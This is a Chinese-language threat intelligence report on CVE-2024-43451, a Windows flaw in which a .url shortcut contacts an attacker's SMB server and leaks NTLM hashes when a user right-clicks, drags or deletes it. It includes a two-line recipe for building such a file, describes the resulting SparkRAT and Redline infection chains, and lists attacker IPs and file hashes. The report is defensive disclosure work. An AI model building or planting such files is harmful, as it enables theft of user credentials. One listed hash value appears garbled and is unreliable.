检测到新的零日漏洞：CVE-2024-43451

我们的团队在多个 Windows 系统上检测到一个新的零日漏洞。该漏洞会激活 URL 文件，从而导致恶意活动。

这些恶意文件是从乌克兰政府官方网站下载的。该网站允许用户下载学历证书。

该漏洞是通过生成可使用以下非标准操作激活的 URL 文件来利用的：

1. 单击右键（在所有版本的 Windows 中）。

2. 使用删除按钮删除文件（仅在 Windows 10/11 中）。

3. 将文件拖到另一个文件夹（在 Windows 10/11 和 Windows 7/8/8.1 的某些配置中）。

下图是利用过程图：

该研究已与 CERT-UA 共享。乌克兰 CERT 透露，该 URL 文件是由威胁行为者 UAC-0194（疑似俄罗斯人）发起的针对乌克兰实体的活动的一部分进行传播。

该研究还已与 MSRC（微软安全响应中心）共享。微软为Windows系统创建了一个安全补丁来修复该漏洞，并为其赋予了CVE标识符CVE-2024-43451。该安全补丁于 2024 年 11 月 12 日发布。我们要感谢所有参与该研究的同事。

分析

初步检测

我们研究的第一阶段是使用我们的威胁狩猎基础设施检测从乌克兰政府网站下载的可疑 zip 文件。

文件详细信息是：

File name: humeniuk_liubov_stanislavivna[.]zip
File type: ZIP
Md5: 948fe6bc00c9d95e22557718d69c92ca
Sha1: e4f894e9a4d33f5202dbך5a10bcd0b54348ea13f8
Sha256: 07b417ffa08f12201eceba3688690bd5c947f657be00e3c883f6ec342ec5c344

该 ZIP 文件首次由乌克兰的未注册用户于 2024 年 6 月 21 日提交给 VirusTotal。它是从 hXXps[://]doc[.]osvita-kp[.]gov[.]ua/uploads/53/199804/humeniuk_liubov_stanislavivna[.]zip 下载的。

doc[.]osvita-kp[.]gov[.]ua 是乌克兰政府官方网站，隶属于 Kam’yanets’-Podil’s’kyi 市教育和科学部。

ZIP 存档包含两个文件，并被检测为包含两个已知漏洞：

• CVE-2023-320462 – Microsoft Windows MSHTML 平台权限升级漏洞。

• CVE-2023-360251 – Microsoft Windows SmartScreen 安全功能绕过漏洞。

ZIP 存档中包含的 PDF 文件和 URL 文件

ZIP 存档中包含的文件如下：

未标记为恶意的 PDF 文件。该文件包含敖德萨国立理工大学授予 Humeniuk Liubov Stanislavivna（乌克兰语：Гуменюк Любов Станіславівна）的毕业证书。

URL（互联网快捷方式）文件：

URL文件分析

该 URL 引用 IP 地址 92[.]42.96.30 上使用 SMB 协议 (file://) 的外部服务器，以访问两个具有相似名称的 EXE 文件。

• 证书+AF8hFgBf-45052389+AF8-005553[.]exe

• 证书_激活_45052389_005553[.]exe

这些文件在同一服务器上具有不同的 URL 地址。

在检查 URL 文件时，ClearSky 团队暴露了一个新漏洞，与上述两个漏洞无关：右键单击该文件会建立与外部服务器的连接。

单击右键后对 URL 文件进行通信分析。观察到与 IP 地址 92[.]42.96.30 的通信

截至 2024 年 8 月，IP 地址 92[.]42.96.30 属于 Saltu[.]Cloud，这是一家提供虚拟专用服务器 (VPS) 并允许使用虚拟货币付款的俄罗斯公司。引起我们怀疑的是，来自乌克兰政府网站的文件会与此类服务器进行通信。

IP 地址 92[.]42.96.30 的 WHOIS 详细信息

来自 Šaltu Cloud 网站的网页，翻译自俄语

该网站允许使用数字货币付款，并通过 Telegram 提供联系方式

NTLM 哈希泄露

此外，沙箱执行还引发了有关尝试通过 SMB（服务器消息块）协议传递 NTLM（NT Lan Manager）哈希的警报。收到 NTLM 哈希后，攻击者可以执行哈希传递攻击来识别与捕获的哈希关联的用户，而无需相应的密码。

尝试通过 SMB 协议传递 NTLM 哈希，如在 AnyRun 上观察到的

检测相似文件

搜索 URL 文件中出现的几个唯一字符串后，发现了数十个结构相似的 URL 文件，其中包含 ClearSky 研究团队公开的漏洞。其中第一个于 2024 年 4 月 10 日提交给 VirusTotal，名为 images/Certificate_%E2%84%96_45052389_005553[.]zip[.]url：

在分析的初始 URL 文件（下载具有相同文件名的 EXE 文件）中也观察到了文件名结构（以“证书”开头并以数字 005553 结尾）。该文件与第一个检测到的 URL 文件通信的 IP 地址范围相同 – 92[.]42.96.10。

• NTLM 是一套 Microsoft 安全协议，旨在为用户提供身份验证、完整性和机密性。

• SMB 是一种客户端-服务器通信协议，用于共享对文件、打印机、串行端口和其他资源的访问网络。

• 而第一个检测到的 URL 文件与 IP 地址 92[.]42.96.30 进行通信。

左：第一个检测到的文件，从 gov[.]ua 下载。右：2024 年 4 月 10 日提交给 VT 的第一个文件

检测到的利用新漏洞的其他文件遵循类似的攻击场景，最终安装了 Redline Stealer 恶意软件。

这种相似性有两种可能的解释：

• 一名攻击者使用不同类型的恶意软件（初始文件安装 SparkRAT 恶意软件）。

• 两个不同的威胁参与者利用同一漏洞。

URL文件零日漏洞分析

对从 gov[.]ua 下载的初始 URL 进行分析，发现以下两行代码可利用该漏洞：

[互联网快捷方式]。

URL=file://XXX.XXX.XXX.XXX – XXX 可以是任何 IP 地址，在 http 或 https 中不起作用，必须是 SMB 协议。

创建利用该漏洞的文件的阶段如下：

创建一个文本文件并添加以上两行：

将文件另存为 URL 文件：

单击右键即可通过 SMB 协议与攻击者的服务器建立通信：

通过添加以下行，可以将 URL 文件的图标更改为所选图标：

IconIndex=X（X 是 1-300 或 350 之间的任意数字）

IconFile=C:WindowsSystem32SHELL32.dll

如下图所示：

结果如下：

进一步调查发现，在 Windows 10 和 11 操作系统中，将文件从一个文件夹拖到另一个文件夹（通过 Ctrl+C、Ctrl+V 复制和粘贴文件时不会发生这种情况）或删除文件的操作会导致文件与嵌入式服务器通信，然后才被删除或移动。

在 Windows 7、8 和 8.1 上，文件在拖动或删除时不会启动通信，除非目标文件夹在拖动时处于打开状态（第一次尝试时不会发生这种情况，但仅在 2-3 次尝试后才观察到） 。也就是说，新检测到的漏洞在 Windows 10/11 操作系统上更容易被利用。

CERT-UA 共享的信息

CERT-UA 与 ClearSky 共享了有关发送到目标以启动攻击链的电子邮件的技术信息。诱饵电子邮件是从乌克兰政府服务器发送的。消息正文包括更新学历证书的要求，因为据称当前证书即将过期。

单击 URL 文件（即使单击右键）时，就会与攻击者的服务器建立通信，最终导致下载名为 Certificate_Activate_45052389_005553[.]exe 的文件。该文件由江夏信息科技（惠州）有限公司未经验证的签名签署。

江夏信息科技（惠州）有限公司未经验证的签名

通过执行文件certificate_activate_45052389_00553[.]exe执行的操作

执行该文件时，会出现错误消息，提示证书已激活，并且信息已发送至政府认证系统。

攻击者在执行文件后使用错误消息声称证书已成功激活

然后名为 Learn[.]cmd 的文件被删除并执行。CMD 文件包含通过添加垃圾字符串并使用多个变量进行编码的命令，这些变量放在一起时会创建命令：

文件 Learn[.]cmd 执行的命令：

• Tasklist[.]exe – 列出系统上运行的所有任务。

• findstr /I avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe – 检查已安装的 AV 引擎。

• findstr /I “wrsa.exe opssvc.exe” – 检查其他安全组件。

• findstr /V “RealizedLivingFiredVotes” Cornwall – 查找由Certificate_Activate_45052389_005553[.]exe生成的文件“Cornwall”，其中包含可执行标头和字符串RealizedLivingFiredVotes。生成可执行文件时忽略该字符串。

“Cornwall”文件：

最终有效载荷

攻击场景中的进一步操作：”

• 使用编程语言 Autolt 执行 SparkRAT 恶意软件。

• 创建计划任务 Wave360 Sync Technologies CoSyncWave360[.]js 以建立持久性。

• 通过将文件 SyncWave360[.]js 复制到启动文件夹来创建附加的持久层。

• SparkRAT 通过端口 8000 与服务器 77[.]83.172.47 通信。

SparkRAT 是 GitHub 上提供的开源恶意软件。以下是 GitHub 页面上该恶意软件的功能：

之前类似场景的攻击

这种攻击向量并不是唯一的，并且在过去的攻击中已经观察到：

• 认知攻击者 Handala 发起的攻击活动包括冒充 CrowdStrike。

• 宣传通用窃取者的活动，不归因于特定参与者（Lumma Stealer）。

ClearSky 评估这是一个常见过程（可能由公共工具促进），攻击者利用它来逃避 AV 引擎的检测。

IOC:

Files (SHA-256):

aac3f49b8c875ca842f96dd6dde194102944907a956fad1ff1cff14c64aaf2e0

07b417ffa08f12201eceba3688690bd5c947f657be00e3c883f6ec342ec5c344

0efe4a603dd59b377798ae2889fe47a851f79e36d1a925d327a93416204d1767

6c6ba73e4c80853219121f922e60564720d414bf42d8bc542dac800560d1eb36

df74298b2ecb33558bd34b7d59bcade5901eb5db1b61ce9aa1ae27e597f4f58d

928cdef8fb7c2ba9aa96ab726d74aa7a18b032102d9ec4ed00e7559f98c1bdf9

e4a6368556c15d316960bd605827c00e336ef6e56c369090803a46ff69dfd4ac

715a69b898bd0a056098d24505046391e29381f671952d5e860c0cb41779a49f

c423ea5a16e33d3b988358ad649bb43a3265cad8e118ed91863d8b9dc3e8f8f9

caba3a8900302df5b83d260ed1f4da19b68f8c2d1b92c6dfc91b2ca01f14a1ef

8cf24fe1384ca8ea763081b78fd14995704bbd73a871ebe1c362053767aeec20

5499a4bf696fdbbe41cdc2bc9efae2df93306a135643a3651701c5ca57570eb7

ad10aaac2661b2dd17ef586a2bf8f3dca7a82abda2580dbd3aca2d52cc5460ae

6de2602f486985bfadae3b4ac06af041f22fd41559954a6ecd262f7c3a8aa681

d6d77204740bd3bdd2fd5e918a7ba9134c1d7d10eb3d6972749009dd50df6cc8

34073f2055002791ed3cad21be0e94b33ff4345eab8a5e7801dfdafa7cc2fb99

e2ad6fa6dbe71e9ab10dcf3bad4b82538dabe34a3011fdaa2eeb302b67ea776d

6ec7f86cc19df1fef8063242ef6861355cc7ed25a669de842e1cda7332eca343

994fa6d6b44379a8271e0936cf2a2e898de4f720ab8c1fec98be674f20df883d 

IP addresses:

92.42.96[.]10

92.42.96[.]30

89.23.102[.]251

89.23.101[.]101

77.83.172[.]47